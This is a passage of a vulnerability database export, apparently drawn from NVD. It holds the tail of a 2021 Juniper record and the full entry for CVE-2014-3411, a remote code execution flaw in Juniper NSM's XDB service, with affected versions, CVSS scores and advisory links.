"NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "sirt@juniper.net", "type": "Secondary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.6, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2021-07-15T20:15:10.563", "references": [ { "source": "sirt@juniper.net", "tags": [ "Vendor Advisory" ], "url": "https://kb.juniper.net/JSA11191" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://kb.juniper.net/JSA11191" } ], "sourceIdentifier": "sirt@juniper.net", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-367" } ], "source": "sirt@juniper.net", "type": "Secondary" }, { "description": [ { "lang": "en", "value": "CWE-367" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
Vendor | Product | Version | |
---|---|---|---|
juniper | network_and_security_manager_software | * | |
juniper | network_and_security_manager_software | 2012.2 | |
juniper | network_and_security_manager_software | 2012.2 | |
juniper | network_and_security_manager_software | 2012.2 | |
juniper | network_and_security_manager_software | 2012.2 | |
juniper | network_and_security_manager_software | 2012.2 | |
juniper | network_and_security_manager_software | 2012.2 | |
juniper | network_and_security_manager_software | 2012.2 | |
juniper | nsm3000 | - | |
juniper | nsmexpress | - |
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:juniper:network_and_security_manager_software:*:r7:*:*:*:*:*:*", "matchCriteriaId": "BF51EB1E-DA95-45E7-AC8C-DAA96684948A", "versionEndIncluding": "2012.2", "vulnerable": true }, { "criteria": "cpe:2.3:a:juniper:network_and_security_manager_software:2012.2:-:*:*:*:*:*:*", "matchCriteriaId": "13CFD3D1-FD3C-4F13-90E9-B72F07391937", "vulnerable": true }, { "criteria": "cpe:2.3:a:juniper:network_and_security_manager_software:2012.2:r1:*:*:*:*:*:*", "matchCriteriaId": "BBF15FAA-0EB0-4DA0-BA06-2F1FA798C7A4", "vulnerable": true }, { "criteria": "cpe:2.3:a:juniper:network_and_security_manager_software:2012.2:r2:*:*:*:*:*:*", "matchCriteriaId": "1B46A65B-2F35-4BF1-A6DA-C76C4DAAF6AE", "vulnerable": true }, { "criteria": "cpe:2.3:a:juniper:network_and_security_manager_software:2012.2:r3:*:*:*:*:*:*", "matchCriteriaId": "4D1053DA-89C2-46BD-948B-7C75518DC9D7", "vulnerable": true }, { "criteria": "cpe:2.3:a:juniper:network_and_security_manager_software:2012.2:r4:*:*:*:*:*:*", "matchCriteriaId": "0FEE9E73-5FC2-48EC-90AB-8588CF6921FD", "vulnerable": true }, { "criteria": "cpe:2.3:a:juniper:network_and_security_manager_software:2012.2:r5:*:*:*:*:*:*", "matchCriteriaId": "3AB8731E-B3FE-42FC-9FAE-1E51978C5113", "vulnerable": true }, { "criteria": "cpe:2.3:a:juniper:network_and_security_manager_software:2012.2:r6:*:*:*:*:*:*", "matchCriteriaId": "74E35C07-038A-463C-A382-6C96D6879E67", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:juniper:nsm3000:-:*:*:*:*:*:*:*", "matchCriteriaId": "1DD754FD-CC22-47BA-A2A7-4835CC8E55E0", "vulnerable": true }, { "criteria": "cpe:2.3:h:juniper:nsmexpress:-:*:*:*:*:*:*:*", "matchCriteriaId": "9E5B7D06-3E72-49C1-9ABA-7BD68860C1F7", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "Unspecified vulnerability in the NSM XDB service in Juniper NSM before 2012.2R8 allows remote attackers to execute arbitrary code via unspecified vectors." }, { "lang": "es", "value": "Vulnerabilidad no especificada en el servicio NSM XDB en Juniper NSM en versiones anteriores a 2012.2R8 permite a atacantes remotos ejecutar c\u00f3digo arbitrario a trav\u00e9s de vectores no especificados." } ], "id": "CVE-2014-3411", "lastModified": "2024-11-21T02:08:02.087", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ] }, "published": "2014-05-19T14:55:12.047", "references": [ { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "http://secunia.com/advisories/58684" }, { "source": "cve@mitre.org", "url": "http://www.securityfocus.com/bid/67445" }, { "source": "cve@mitre.org", "url": "http://www.securitytracker.com/id/1030253" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA10625" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "http://secunia.com/advisories/58684" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "url": "http://www.securityfocus.com/bid/67445" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "url": "http://www.securitytracker.com/id/1030253" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA10625" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "NVD-CWE-noinfo" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }